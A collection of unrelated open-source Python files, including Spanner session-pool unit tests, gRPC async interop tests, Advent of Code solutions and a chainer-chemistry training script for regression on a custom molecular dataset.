self.assertTrue(pool._pending_sessions.empty())
def test_bind_w_timestamp_race(self):
import datetime
from google.cloud._testing import _Monkey
from google.cloud.spanner_v1 import pool as MUT
NOW = datetime.datetime.utcnow()
pool = self._make_one()
database = _Database('name')
SESSIONS = [_Session(database) for _ in range(10)]
database._sessions.extend(SESSIONS)
with _Monkey(MUT, _NOW=lambda: NOW):
pool.bind(database)
self.assertIs(pool._database, database)
self.assertEqual(pool.size, 10)
self.assertEqual(pool.default_timeout, 10)
self.assertEqual(pool._delta.seconds, 3000)
self.assertTrue(pool._sessions.full())
for session in SESSIONS:
self.assertTrue(session._created)
txn = session._transaction
self.assertTrue(txn._begun)
self.assertTrue(pool._pending_sessions.empty())
def test_put_full(self):
from six.moves.queue import Full
pool = self._make_one(size=4)
database = _Database('name')
SESSIONS = [_Session(database) for _ in range(4)]
database._sessions.extend(SESSIONS)
pool.bind(database)
with self.assertRaises(Full):
pool.put(_Session(database))
self.assertTrue(pool._sessions.full())
def test_put_non_full_w_active_txn(self):
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
pending = pool._pending_sessions = _Queue()
database = _Database('name')
session = _Session(database)
txn = session.transaction()
pool.put(session)
self.assertEqual(len(queue._items), 1)
_, queued = queue._items[0]
self.assertIs(queued, session)
self.assertEqual(len(pending._items), 0)
self.assertFalse(txn._begun)
def test_put_non_full_w_committed_txn(self):
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
pending = pool._pending_sessions = _Queue()
database = _Database('name')
session = _Session(database)
committed = session.transaction()
committed._committed = True
pool.put(session)
self.assertEqual(len(queue._items), 0)
self.assertEqual(len(pending._items), 1)
self.assertIs(pending._items[0], session)
self.assertIsNot(session._transaction, committed)
self.assertFalse(session._transaction._begun)
def test_put_non_full(self):
pool = self._make_one(size=1)
queue = pool._sessions = _Queue()
pending = pool._pending_sessions = _Queue()
database = _Database('name')
session = _Session(database)
pool.put(session)
self.assertEqual(len(queue._items), 0)
self.assertEqual(len(pending._items), 1)
self.assertIs(pending._items[0], session)
self.assertFalse(pending.empty())
def test_begin_pending_transactions_empty(self):
pool = self._make_one(size=1)
pool.begin_pending_transactions() # no raise
def test_begin_pending_transactions_non_empty(self):
pool = self._make_one(size=1)
pool._sessions = _Queue()
database = _Database('name')
TRANSACTIONS = [_Transaction()]
PENDING_SESSIONS = [
_Session(database, transaction=txn) for txn in TRANSACTIONS]
pending = pool._pending_sessions = _Queue(*PENDING_SESSIONS)
self.assertFalse(pending.empty())
pool.begin_pending_transactions() # no raise
for txn in TRANSACTIONS:
self.assertTrue(txn._begun)
self.assertTrue(pending.empty())
class TestSessionCheckout(unittest.TestCase):
def _getTargetClass(self):
from google.cloud.spanner_v1.pool import SessionCheckout
return SessionCheckout
def _make_one(self, *args, **kwargs):
return self._getTargetClass()(*args, **kwargs)
def test_ctor_wo_kwargs(self):
pool = _Pool()
checkout = self._make_one(pool)
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {})
def test_ctor_w_kwargs(self):
pool = _Pool()
checkout = self._make_one(pool, foo='bar')
self.assertIs(checkout._pool, pool)
self.assertIsNone(checkout._session)
self.assertEqual(checkout._kwargs, {'foo': 'bar'})
def test_context_manager_wo_kwargs(self):
session = object()
pool = _Pool(session)
checkout = self._make_one(pool)
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
with checkout as borrowed:
self.assertIs(borrowed, session)
self.assertEqual(len(pool._items), 0)
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
self.assertEqual(pool._got, {})
def test_context_manager_w_kwargs(self):
session = object()
pool = _Pool(session)
checkout = self._make_one(pool, foo='bar')
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
with checkout as borrowed:
self.assertIs(borrowed, session)
self.assertEqual(len(pool._items), 0)
self.assertEqual(len(pool._items), 1)
self.assertIs(pool._items[0], session)
self.assertEqual(pool._got, {'foo': 'bar'})
class _Transaction(object):
_begun = False
_committed = False
_rolled_back = False
def begin(self):
self._begun = True
def committed(self):
return self._committed
@total_ordering
class _Session(object):
_transaction = None
def __init__(self, database, exists=True, transaction=None):
self._database = database
self._exists = exists
self._exists_checked = False
self._created = False
self._deleted = False
self._transaction = transaction
def __lt__(self, other):
return id(self) < id(other)
def create(self):
self._created = True
def exists(self):
self._exists_checked = True
return self._exists
def delete(self):
from google.cloud.exceptions import NotFound
self._deleted = True
if not self._exists:
raise NotFound("unknown session")
def transaction(self):
txn = self._transaction = _Transaction()
return txn
class _Database(object):
def __init__(self, name):
self.name = name
self._sessions = []
def session(self):
return self._sessions.pop()
class _Queue(object):
_size = 1
def __init__(self, *items):
self._items = list(items)
def empty(self):
return len(self._items) == 0
def full(self):
return len(self._items) >= self._size
def get(self, **kwargs):
from six.moves.queue import Empty
self._got = kwargs
try:
return self._items.pop()
except IndexError:
raise Empty()
def put(self, item, **kwargs):
self._put = kwargs
self._items.append(item)
def put_nowait(self, item, **kwargs):
self._put_nowait = kwargs
self._items.append(item)
class _Pool(_Queue):
_database = None
``` |
{
"source": "jo2y/grpc",
"score": 2
} |
#### File: tests_aio/interop/local_interop_test.py
```python
import logging
import unittest
import grpc
from grpc.experimental import aio
from src.proto.grpc.testing import test_pb2_grpc
from tests.interop import resources
from tests_aio.interop import methods
from tests_aio.unit._test_base import AioTestBase
from tests_aio.unit._test_server import start_test_server
class InteropTestCaseMixin:
"""Unit test methods.
This class must be mixed in with unittest.TestCase and a class that defines
setUp and tearDown methods that manage a stub attribute.
"""
_stub: test_pb2_grpc.TestServiceStub
async def test_empty_unary(self):
await methods.test_interoperability(methods.TestCase.EMPTY_UNARY,
self._stub, None)
async def test_large_unary(self):
await methods.test_interoperability(methods.TestCase.LARGE_UNARY,
self._stub, None)
async def test_server_streaming(self):
await methods.test_interoperability(methods.TestCase.SERVER_STREAMING,
self._stub, None)
async def test_client_streaming(self):
await methods.test_interoperability(methods.TestCase.CLIENT_STREAMING,
self._stub, None)
async def test_ping_pong(self):
await methods.test_interoperability(methods.TestCase.PING_PONG,
self._stub, None)
async def test_cancel_after_begin(self):
await methods.test_interoperability(methods.TestCase.CANCEL_AFTER_BEGIN,
self._stub, None)
async def test_cancel_after_first_response(self):
await methods.test_interoperability(
methods.TestCase.CANCEL_AFTER_FIRST_RESPONSE, self._stub, None)
@unittest.skip('TODO(https://github.com/grpc/grpc/issues/21707)')
async def test_timeout_on_sleeping_server(self):
await methods.test_interoperability(
methods.TestCase.TIMEOUT_ON_SLEEPING_SERVER, self._stub, None)
async def test_empty_stream(self):
await methods.test_interoperability(methods.TestCase.EMPTY_STREAM,
self._stub, None)
async def test_status_code_and_message(self):
await methods.test_interoperability(
methods.TestCase.STATUS_CODE_AND_MESSAGE, self._stub, None)
async def test_unimplemented_method(self):
await methods.test_interoperability(
methods.TestCase.UNIMPLEMENTED_METHOD, self._stub, None)
async def test_unimplemented_service(self):
await methods.test_interoperability(
methods.TestCase.UNIMPLEMENTED_SERVICE, self._stub, None)
async def test_custom_metadata(self):
await methods.test_interoperability(methods.TestCase.CUSTOM_METADATA,
self._stub, None)
async def test_special_status_message(self):
await methods.test_interoperability(
methods.TestCase.SPECIAL_STATUS_MESSAGE, self._stub, None)
class InsecureLocalInteropTest(InteropTestCaseMixin, AioTestBase):
async def setUp(self):
address, self._server = await start_test_server()
self._channel = aio.insecure_channel(address)
self._stub = test_pb2_grpc.TestServiceStub(self._channel)
async def tearDown(self):
await self._channel.close()
await self._server.stop(None)
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
unittest.main(verbosity=2)
``` |
{
"source": "jo3-l/advent",
"score": 3
} |
#### File: 2020/01/p2.py
```python
def solve(input):
xs = list(map(int, input.split()))
xs.sort()
for i, x in enumerate(xs):
if i == 0 or i == len(xs) - 1:
continue
lo, hi = 0, len(xs) - 1
while lo < i and i < hi:
s = xs[lo] + xs[hi] + x
if s > 2020:
hi -= 1
elif s == 2020:
return xs[lo] * xs[hi] * x
else:
lo += 1
```
#### File: 2020/04/p1.py
```python
def solve(input):
cnt = 0
for p in input.split("\n\n"):
seen = set()
for l in p.split("\n"):
for f in ("byr", "iyr", "eyr", "hgt", "hcl", "ecl", "pid"):
if l.count(f) > 0:
seen.add(f)
if len(seen) == 7:
cnt += 1
return cnt
```
#### File: 2020/07/p1.py
```python
from collections import defaultdict
def solve(input):
par = defaultdict(list)
for l in input.split("\n"):
n, _, c = l.partition(" contain ")
parent = n.removesuffix(" bags")
for child in c.split(", "):
par[" ".join(child.split()[1:-1])].append(parent)
seen = set()
def go(x):
for p in par[x]:
if p not in seen:
seen.add(p)
go(p)
go("shiny gold")
return len(seen)
```
#### File: 2020/08/p2.py
```python
def run(insts):
seen = set()
inst = 0
acc = 0
while inst not in seen and 0 <= inst < len(insts):
seen.add(inst)
op, by = insts[inst]
if op == "nop":
inst += 1
elif op == "acc":
acc += by
inst += 1
else:
inst += by
return acc, inst >= len(insts)
def solve(input):
insts = [
[op, int(by)]
for op, _, by in map(lambda l: l.partition(" "), input.split("\n"))
]
for inst in insts:
op = inst[0]
if op not in ("nop", "jmp"):
continue
inst[0] = "jmp" if op == "nop" else "nop"
acc, ok = run(insts)
if ok:
return acc
inst[0] = op
```
#### File: 2020/09/p2.py
```python
import itertools
K = 25
def solve(input):
xs = list(map(int, input.split()))
bad_idx = next(
i + K
for i, x in enumerate(xs[K:])
if not any(
xs[j] + xs[k] == x for j, k in itertools.product(range(i, i + K), repeat=2)
)
)
lo_idx = {}
acc = list(itertools.accumulate(xs[:bad_idx]))
for i, x in enumerate(acc):
c = x - xs[bad_idx]
if c in lo_idx:
window = xs[lo_idx[c] + 1 : i + 1]
return min(window) + max(window)
lo_idx[acc[i - 1] if i > 0 else 0] = i - 1
```
#### File: 2020/10/p2.py
```python
from collections import defaultdict
def solve(input):
xs = list(map(int, input.split()))
xs.append(0)
xs.sort()
xs.append(xs[-1] + 3)
dp = [0] * (len(xs) + 1)
aux = defaultdict(int)
aux[0] = dp[0] = 1
for i in range(1, len(xs) + 1):
dp[i] = sum(aux[xs[i - 1] - d] for d in range(1, 4))
aux[xs[i - 1]] += dp[i]
return dp[len(xs)]
```
#### File: 2021/02/p2.py
```python
from collections import defaultdict, Counter, deque
from functools import cache
import math
import re
import itertools
import sys
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
with open(sys.argv[1]) as f:
input = f.read()
def solve(input):
h_pos = depth = aim = 0
for inst in input.split("\n"):
typ, n = inst.split()
n = int(n)
if typ == "forward":
h_pos += n
depth += aim * n
elif typ == "down":
aim += n
else:
aim -= n
return h_pos * depth
print(solve(input.rstrip("\n")))
```
#### File: 2021/03/p2.py
```python
from collections import defaultdict, Counter, deque
from functools import cache
import math
import re
import itertools
import sys
import operator
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
with open(sys.argv[1]) as f:
input = f.read()
def solve(input):
l = len(input.split()[0])
xs = lmap(lambda x: int(x, 2), input.split())
def calc(choose, pref):
selected = xs
i = l - 1
while i >= 0 and len(selected) > 1:
cnt = [0, 0]
for x in selected:
cnt[(x >> i) & 1] += 1
f = pref if cnt[0] == cnt[1] else int(choose(cnt[1], cnt[0]))
selected = [x for x in selected if ((x >> i) & 1) == f]
i -= 1
return selected[0]
return calc(operator.gt, 1) * calc(operator.lt, 0)
print(solve(input.rstrip("\n")))
```
#### File: 2021/06/p2.py
```python
import re
from functools import cache
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
@cache
def F(d, s):
reset_at = d - s - 1
if reset_at < 0:
return 1
return F(reset_at, 6) + F(reset_at, 8)
def solve(input):
return sum(F(256, x) for x in ints(re.findall(r"-?\d+", input)))
```
#### File: 2021/08/p2.py
```python
import itertools
def solve(input):
good = [
"abcefg",
"cf",
"acdeg",
"acdfg",
"bcdf",
"abdfg",
"abdefg",
"acf",
"abcdefg",
"abcdfg",
]
n = 0
for l in input.split("\n"):
observed, _, out = l.partition(" | ")
observed = observed.split()
for conf in itertools.permutations("abcdefg"):
trans = str.maketrans(dict(zip(conf, "abcdefg")))
if all("".join(sorted(w.translate(trans))) in good for w in observed):
n += int(
"".join(
str(good.index("".join(sorted(w.translate(trans)))))
for w in out.split()
)
)
return n
```
#### File: 2021/10/p2.py
```python
import statistics
def get_completion_points(s):
open, close = "([{<", ")]}>"
stk = []
for c in s:
if c in open:
stk.append(close[open.index(c)])
elif not stk or stk.pop() != c:
return 0
score = 0
for c in reversed(stk):
score *= 5
score += close.index(c) + 1
return score
def solve(input):
return statistics.median(
filter(bool, (get_completion_points(s) for s in input.split()))
)
```
#### File: 2021/14/p2.py
```python
from collections import Counter
def solve(input):
paras = input.split("\n\n")
tmpl = paras[0]
insert = dict(map(lambda line: line.split(" -> "), paras[1].split("\n")))
pairs = Counter()
for a, b in zip(tmpl, tmpl[1:]):
pairs[a + b] += 1
first, last = tmpl[0:2], tmpl[-2:]
for _ in range(40):
nxt_pairs = Counter()
for (a, c), n in pairs.items():
b = insert[a + c]
nxt_pairs[a + b] += n
nxt_pairs[b + c] += n
first = first[0] + insert[first]
last = insert[last] + last[1]
pairs = nxt_pairs
ctr = Counter()
for p, n in pairs.items():
ctr[p[0]] += n
ctr[p[1]] += n
most, *_, least = ctr.most_common()
def adjust(e):
return (e[1] + 1) // 2 if e[0] in (first[0], last[1]) else e[1] // 2
return adjust(most) - adjust(least)
```
#### File: 2021/15/p1.py
```python
from heapq import heappush, heappop
import math
adj4 = ((0, -1), (0, 1), (1, 0), (-1, 0))
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
def make_indexer(lst, default=None):
def get(*indices):
cur = lst
for i in indices:
if 0 <= i < len(cur):
cur = cur[i]
else:
return default
return cur
return get
def solve(input):
matrix = [ints(l) for l in input.split("\n")]
m, n = len(matrix), len(matrix[0])
get = make_indexer(matrix, -1)
heap = []
heappush(heap, (0, 0, 0))
best = [[math.inf] * n for _ in range(m)]
best[0][0] = 0
while heap:
rsk, i, j = heappop(heap)
if best[i][j] != rsk:
continue
for dx, dy in adj4:
if get(i + dy, j + dx) != -1:
nxt_rsk = rsk + get(i + dy, j + dx)
if nxt_rsk < best[i + dy][j + dx]:
best[i + dy][j + dx] = nxt_rsk
heappush(heap, (nxt_rsk, i + dy, j + dx))
return best[-1][-1]
```
#### File: jo3-l/advent/template.py
```python
from collections import defaultdict, Counter, deque
from functools import cache
import math
import re
import itertools
import os
from heapq import heappush, heappop
adj4 = ((0, -1), (0, 1), (1, 0), (-1, 0))
adj8 = ((1, 0), (-1, 0), (0, 1), (0, -1), (1, -1), (1, 1), (-1, 1), (-1, -1))
def lmap(f, it):
return list(map(f, it))
def ints(it):
return lmap(int, it)
def make_indexer(lst, default=None):
def get(*indices):
cur = lst
for i in indices:
if 0 <= i < len(cur):
cur = cur[i]
else:
return default
return cur
return get
def solve(input):
...
cur_dir = os.path.dirname(os.path.realpath(__file__))
def normalize_str(s):
return "\n".join([l.strip() for l in s.strip().splitlines()])
print("SAMPLE OUTPUT")
with open(os.path.join(cur_dir, "sample.txt")) as file:
print(solve(normalize_str(file.read())))
print("---")
print("OUTPUT")
with open(os.path.join(cur_dir, "input.txt")) as file:
print(solve(normalize_str(file.read())))
``` |
{
"source": "jo3-l/liftoff",
"score": 2
} |
#### File: src/parse/errors.py
```python
class SyntaxError(Exception):
def __init__(self, msg: str, line: int, col: int):
super().__init__(f"{line}:{col}: {msg}")
self.line = line
self.col = col
``` |
{
"source": "JO3QMA/TGRPC",
"score": 2
} |
#### File: JO3QMA/TGRPC/settings.py
```python
class Settings:
def __init__(self):
self.img_width = 256
self.img_height = 256
self.img_bg_color = (0, 0, 0)
self.img_margin = 8
self.element_ary = ["A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","ᛆ","ᛖ","ᚺ","ᛁ","ᚷ","ᚲ","ᛜ","ᚦ","ᛏ","ᛉ"]
self.element_count = 40
self.element_font_min_size = 1
self.element_font_max_size = 32
self.element_font_path = './fonts/RuneAMN_Sans_1.20171016.otf'
self.element_font_color = (255, 255, 255)
``` |
{
"source": "jo675/labs",
"score": 4
} |
#### File: jo675/labs/lab1.py
```python
import math
calculations = 0
total_volume= 0
choice =''
def number_of_calculations():
"""
Increment calculations.
"""
global calculations
calculations += 1
def total_volume_calculated(volume):
"""
Total volume appended.
"""
global total_volume
total_volume += volume
def cube_volume():
"""
Calculate the volume of a cube.
"""
a = eval(input("Enter side of cube in cm "))
volume = a**3
return round(volume, 2)
def tetrahedron_volume():
"""
Calculate the volume of a tedrahedron.
"""
b = eval(input("Enter side of tetrahedron in cm "))
volume = (b ** 3 / (6 * math.sqrt(2)))
return round(volume, 2)
def ask_user():
"""
Ask user what to calculate.
"""
try:
choice = input('select: ')
return choice
except:
return 0
def show_menu():
print('============================================')
print(' WELCOME ')
print('Press 1. Calculate the volume of a cube' )
print('Press 2. Calculate the volume of tetrahedron')
print('============================================')
show_menu()
while True:
choice = ask_user()
if choice == '1':
x = cube_volume()
print(f'The volume of your cube is {x} cm^3\n')
number_of_calculations()
total_volume_calculated(x)
elif choice == '2':
y = tetrahedron_volume()
print(f'The volume of your tedrahedron is {y} cm^3\n')
number_of_calculations()
total_volume_calculated(y)
elif choice == 'Q':
print('Good bye')
break
else:
print('wrong option')
print(f'You have made calculations: {calculations}')
print(f'Your total area calculated: {total_volume}')
```
#### File: jo675/labs/translate.py
```python
def translate_1(text):
for i in text:
text = text.replace("a", "4")
text = text.replace("b", "8")
text = text.replace("e", "3")
text = text.replace("l", "1")
text = text.replace("o", "0")
text = text.replace("s", "5")
text = text.replace("t", "7")
return text
trans_table = [('a', '4'), ("b", "8"), ("e", "3"), ("l", "1"),("o", "0"), ("s", "5"), ("t", "7") ]
def translate_2(text):
for i in range(len(trans_table)):
text = text.replace(*trans_table[i])
return text
the_string = input('enter a string: ')
translate1 = translate_1(the_string)
print(f'L33t H4x0R: {translate1}')
translate2 = translate_2(the_string)
print(f'L33t H4x0R: {translate2}')
``` |
{
"source": "jo6pak/StockQuote",
"score": 3
} |
#### File: jo6pak/StockQuote/StockQuote.py
```python
import time
import ystockquote
from termcolor import colored
from datetime import datetime
import Adafruit_CharLCD as LCD
import Adafruit_GPIO.MCP230xx as MCP
import logging
#####################################################################
# MCP23017 not working as advertised. Shows up as i2C device
# but lcd functions dont work properly. Investigate later, use gpios to
# drive LCD for now
#####################################################################
# Define MCP pins connected to the LCD.
#lcd_rs = 0
#lcd_en = 1
#lcd_d4 = 2
#lcd_d5 = 3
#lcd_d6 = 4
#lcd_d7 = 5
#lcd_backlight = 6
# Optionally if the backlight is not controllable then set:
# lcd_backlight = None
# Define LCD column and row size for 16x2 LCD.
#lcd_columns = 16
#lcd_rows = 2
# Initialize MCP23017 device using its default 0x20 I2C address.
#gpio = MCP.MCP23017()
# Initialize the LCD using the pins
#lcd = LCD.Adafruit_CharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,
# lcd_columns, lcd_rows, lcd_backlight, gpio=gpio)
##############################################################################
# Default: Initialize the LCD using the pins
lcd = LCD.Adafruit_CharLCDPlate()
lcd.clear()
# Define LCD column and row size for 16x2 LCD.
lcd_columns = 16
lcd_rows = 2
empty_space = ' '
##############################################################################
def post_quote(quote, price, change):
# Clear LCD, reset cursor
lcd.clear()
# Set LCd backlight color to red or green
try:
if float(change) < 0:
lcd.set_color(1.0,0.0,0.0)
#print colored(elem + ": " + price + " " + change, 'red')
else:
lcd.set_color(0.0,1.0,0.0)
#print colored(elem + ": " + price + " " + change, 'green')
except Exception:
print("Debug: Post Quote exception")
pass
# Quote on first line + price info on second line
lcd.message(empty_space + quote + '\n' + empty_space + price + ' ' + change)
for i in range(lcd_columns):
time.sleep(0.35)
lcd.move_left()
return 0
##############################################################################
# Run in a loop
while 1:
with open('/home/pi/StockQuote/quotelist') as f:
tickerSymbol = f.read().splitlines()
# parse the ticker symbol list for individual symbols and print out current price and change since previous days close.
for elem in tickerSymbol:
try: allInfo = ystockquote.get_all(elem)
except Exception:
print("Debug: Hit Exception...ignore")
pass
post_quote(elem, allInfo["price"], allInfo["change"])
``` |
{
"source": "jo7oem/JiwaiCtl",
"score": 3
} |
#### File: JiwaiCtl/machines_controller/gauss_ctl.py
```python
import time
import pyvisa as visa
class GaussMeterOverRangeError(Exception):
pass
class GaussMeter:
def __init__(self) -> None:
self.__gs = visa.ResourceManager().open_resource("ASRL3::INSTR") # linux "ASRL/dev/ttyUSB0::INSTR"
def __query(self, command: str) -> str:
res = self.__gs.query(command)
return res.strip("\r\n")
def __write(self, command: str) -> None:
self.__gs.write(command)
def magnetic_field_fetch(self) -> float:
"""磁界の値を測定機器に問い合わせ,Gauss単位で返す
:return: 磁界の値(Gauss)
:rtype float
"""
try:
res = float(self.__query("FIELD?"))
except ValueError: # オーバーレンジ発生時の挙動
plobe_range = self.range_fetch()
if range == 0: # 30kOe以上の挙動
raise GaussMeterOverRangeError()
self.range_set(plobe_range - 1)
return self.magnetic_field_fetch()
multiplier = self.__query("FIELDM?")
if multiplier == "m":
res = float(res) * 10 ** (-3)
elif multiplier == "k":
res = float(res) * 1000
else:
pass
return res
def readable_magnetic_field_fetch(self) -> str:
"""磁界の値を測定機器に問い合わせ,人間が読みやすい形で返す
:return: 磁界の値
:rtype str
"""
field_str = self.__query("FIELD?") + self.__query("FIELDM?") + self.__query("UNIT?")
return field_str
def range_set(self, range_index: int) -> None:
"""
レンジを切り替える
0:~30.00 kOe
1:~3.000 kOe
2:~300.0 Oe
3:~30.00 Oe
:param range_index:
:return:
"""
if range_index < 0 or range_index > 3:
range_index = 0
self.__write("RANGE " + str(range_index))
time.sleep(0.2)
return
def range_fetch(self) -> int:
return int(self.__query("RANGE?"))
``` |
{
"source": "jo7ueb/chainer-chemistry",
"score": 3
} |
#### File: examples/own_dataset/train_own_dataset.py
```python
from __future__ import print_function
import chainer
import numpy
import os
import pickle
from argparse import ArgumentParser
from chainer.datasets import split_dataset_random
from chainer import cuda
from chainer import functions as F
from chainer import optimizers
from chainer import training
from chainer import Variable
from chainer.iterators import SerialIterator
from chainer.training import extensions as E
from sklearn.preprocessing import StandardScaler
from chainer_chemistry.dataset.converters import concat_mols
from chainer_chemistry.dataset.parsers import CSVFileParser
from chainer_chemistry.dataset.preprocessors import preprocess_method_dict
from chainer_chemistry.datasets import NumpyTupleDataset
from chainer_chemistry.models import MLP, NFP, GGNN, SchNet, WeaveNet, RSGCN, Regressor # NOQA
class GraphConvPredictor(chainer.Chain):
def __init__(self, graph_conv, mlp=None):
"""Initializes the graph convolution predictor.
Args:
graph_conv: The graph convolution network required to obtain
molecule feature representation.
mlp: Multi layer perceptron; used as the final fully connected
layer. Set it to `None` if no operation is necessary
after the `graph_conv` calculation.
"""
super(GraphConvPredictor, self).__init__()
with self.init_scope():
self.graph_conv = graph_conv
if isinstance(mlp, chainer.Link):
self.mlp = mlp
if not isinstance(mlp, chainer.Link):
self.mlp = mlp
def __call__(self, atoms, adjs):
h = self.graph_conv(atoms, adjs)
if self.mlp:
h = self.mlp(h)
return h
class MeanAbsError(object):
def __init__(self, scaler=None):
"""Initializes the (scaled) mean absolute error metric object.
Args:
scaler: Standard label scaler.
"""
self.scaler = scaler
def __call__(self, x0, x1):
if isinstance(x0, Variable):
x0 = cuda.to_cpu(x0.data)
if isinstance(x1, Variable):
x1 = cuda.to_cpu(x1.data)
if self.scaler is not None:
scaled_x0 = self.scaler.inverse_transform(cuda.to_cpu(x0))
scaled_x1 = self.scaler.inverse_transform(cuda.to_cpu(x1))
diff = scaled_x0 - scaled_x1
else:
diff = cuda.to_cpu(x0) - cuda.to_cpu(x1)
return numpy.mean(numpy.absolute(diff), axis=0)[0]
class RootMeanSqrError(object):
def __init__(self, scaler=None):
"""Initializes the (scaled) root mean square error metric object.
Args:
scaler: Standard label scaler.
"""
self.scaler = scaler
def __call__(self, x0, x1):
if isinstance(x0, Variable):
x0 = cuda.to_cpu(x0.data)
if isinstance(x1, Variable):
x1 = cuda.to_cpu(x1.data)
if self.scaler is not None:
scaled_x0 = self.scaler.inverse_transform(cuda.to_cpu(x0))
scaled_x1 = self.scaler.inverse_transform(cuda.to_cpu(x1))
diff = scaled_x0 - scaled_x1
else:
diff = cuda.to_cpu(x0) - cuda.to_cpu(x1)
return numpy.sqrt(numpy.mean(numpy.power(diff, 2), axis=0)[0])
class ScaledAbsError(object):
def __init__(self, scaler=None):
"""Initializes the (scaled) absolute error object.
Args:
scaler: Standard label scaler.
"""
self.scaler = scaler
def __call__(self, x0, x1):
if isinstance(x0, Variable):
x0 = cuda.to_cpu(x0.data)
if isinstance(x1, Variable):
x1 = cuda.to_cpu(x1.data)
if self.scaler is not None:
scaled_x0 = self.scaler.inverse_transform(cuda.to_cpu(x0))
scaled_x1 = self.scaler.inverse_transform(cuda.to_cpu(x1))
diff = scaled_x0 - scaled_x1
else:
diff = cuda.to_cpu(x0) - cuda.to_cpu(x1)
return numpy.mean(numpy.absolute(diff), axis=0)[0]
def set_up_predictor(method, n_unit, conv_layers, class_num):
"""Sets up the graph convolution network predictor.
Args:
method: Method name. Currently, the supported ones are `nfp`, `ggnn`,
`schnet`, `weavenet` and `rsgcn`.
n_unit: Number of hidden units.
conv_layers: Number of convolutional layers for the graph convolution
network.
class_num: Number of output classes.
Returns:
An instance of the selected predictor.
"""
predictor = None
mlp = MLP(out_dim=class_num, hidden_dim=n_unit)
if method == 'nfp':
print('Training an NFP predictor...')
nfp = NFP(out_dim=n_unit, hidden_dim=n_unit, n_layers=conv_layers)
predictor = GraphConvPredictor(nfp, mlp)
elif method == 'ggnn':
print('Training a GGNN predictor...')
ggnn = GGNN(out_dim=n_unit, hidden_dim=n_unit, n_layers=conv_layers)
predictor = GraphConvPredictor(ggnn, mlp)
elif method == 'schnet':
print('Training an SchNet predictor...')
schnet = SchNet(out_dim=class_num, hidden_dim=n_unit,
n_layers=conv_layers)
predictor = GraphConvPredictor(schnet, None)
elif method == 'weavenet':
print('Training a WeaveNet predictor...')
n_atom = 20
n_sub_layer = 1
weave_channels = [50] * conv_layers
weavenet = WeaveNet(weave_channels=weave_channels, hidden_dim=n_unit,
n_sub_layer=n_sub_layer, n_atom=n_atom)
predictor = GraphConvPredictor(weavenet, mlp)
elif method == 'rsgcn':
print('Training an RSGCN predictor...')
rsgcn = RSGCN(out_dim=n_unit, hidden_dim=n_unit, n_layers=conv_layers)
predictor = GraphConvPredictor(rsgcn, mlp)
else:
raise ValueError('[ERROR] Invalid method: {}'.format(method))
return predictor
def parse_arguments():
# Lists of supported preprocessing methods/models.
method_list = ['nfp', 'ggnn', 'schnet', 'weavenet', 'rsgcn']
scale_list = ['standardize', 'none']
# Set up the argument parser.
parser = ArgumentParser(description='Regression on own dataset')
parser.add_argument('--datafile', '-d', type=str,
default='dataset_train.csv',
help='csv file containing the dataset')
parser.add_argument('--method', '-m', type=str, choices=method_list,
help='method name', default='nfp')
parser.add_argument('--label', '-l', nargs='+',
default=['value1', 'value2'],
help='target label for regression')
parser.add_argument('--scale', type=str, choices=scale_list,
help='label scaling method', default='standardize')
parser.add_argument('--conv-layers', '-c', type=int, default=4,
help='number of convolution layers')
parser.add_argument('--batchsize', '-b', type=int, default=32,
help='batch size')
parser.add_argument('--gpu', '-g', type=int, default=-1,
help='id of gpu to use; negative value means running'
'the code on cpu')
parser.add_argument('--out', '-o', type=str, default='result',
help='path to save the computed model to')
parser.add_argument('--epoch', '-e', type=int, default=10,
help='number of epochs')
parser.add_argument('--unit-num', '-u', type=int, default=16,
help='number of units in one layer of the model')
parser.add_argument('--seed', '-s', type=int, default=777,
help='random seed value')
parser.add_argument('--train-data-ratio', '-r', type=float, default=0.7,
help='ratio of training data w.r.t the dataset')
parser.add_argument('--protocol', type=int, default=2,
help='pickle protocol version')
parser.add_argument('--model-filename', type=str, default='regressor.pkl',
help='saved model filename')
return parser.parse_args()
def main():
# Parse the arguments.
args = parse_arguments()
if args.label:
labels = args.label
class_num = len(labels) if isinstance(labels, list) else 1
else:
raise ValueError('No target label was specified.')
# Dataset preparation. Postprocessing is required for the regression task.
def postprocess_label(label_list):
return numpy.asarray(label_list, dtype=numpy.float32)
# Apply a preprocessor to the dataset.
print('Preprocessing dataset...')
preprocessor = preprocess_method_dict[args.method]()
parser = CSVFileParser(preprocessor, postprocess_label=postprocess_label,
labels=labels, smiles_col='SMILES')
dataset = parser.parse(args.datafile)['dataset']
# Scale the label values, if necessary.
if args.scale == 'standardize':
scaler = StandardScaler()
labels = scaler.fit_transform(dataset.get_datasets()[-1])
dataset = NumpyTupleDataset(*(dataset.get_datasets()[:-1] + (labels,)))
else:
scaler = None
# Split the dataset into training and validation.
train_data_size = int(len(dataset) * args.train_data_ratio)
train, _ = split_dataset_random(dataset, train_data_size, args.seed)
# Set up the predictor.
predictor = set_up_predictor(args.method, args.unit_num,
args.conv_layers, class_num)
# Set up the iterator.
train_iter = SerialIterator(train, args.batchsize)
# Set up the regressor.
metrics_fun = {'mean_abs_error': MeanAbsError(scaler=scaler),
'root_mean_sqr_error': RootMeanSqrError(scaler=scaler)}
regressor = Regressor(predictor, lossfun=F.mean_squared_error,
metrics_fun=metrics_fun, device=args.gpu)
# Set up the optimizer.
optimizer = optimizers.Adam()
optimizer.setup(regressor)
# Set up the updater.
updater = training.StandardUpdater(train_iter, optimizer, device=args.gpu,
converter=concat_mols)
# Set up the trainer.
print('Training...')
trainer = training.Trainer(updater, (args.epoch, 'epoch'), out=args.out)
trainer.extend(E.snapshot(), trigger=(args.epoch, 'epoch'))
trainer.extend(E.LogReport())
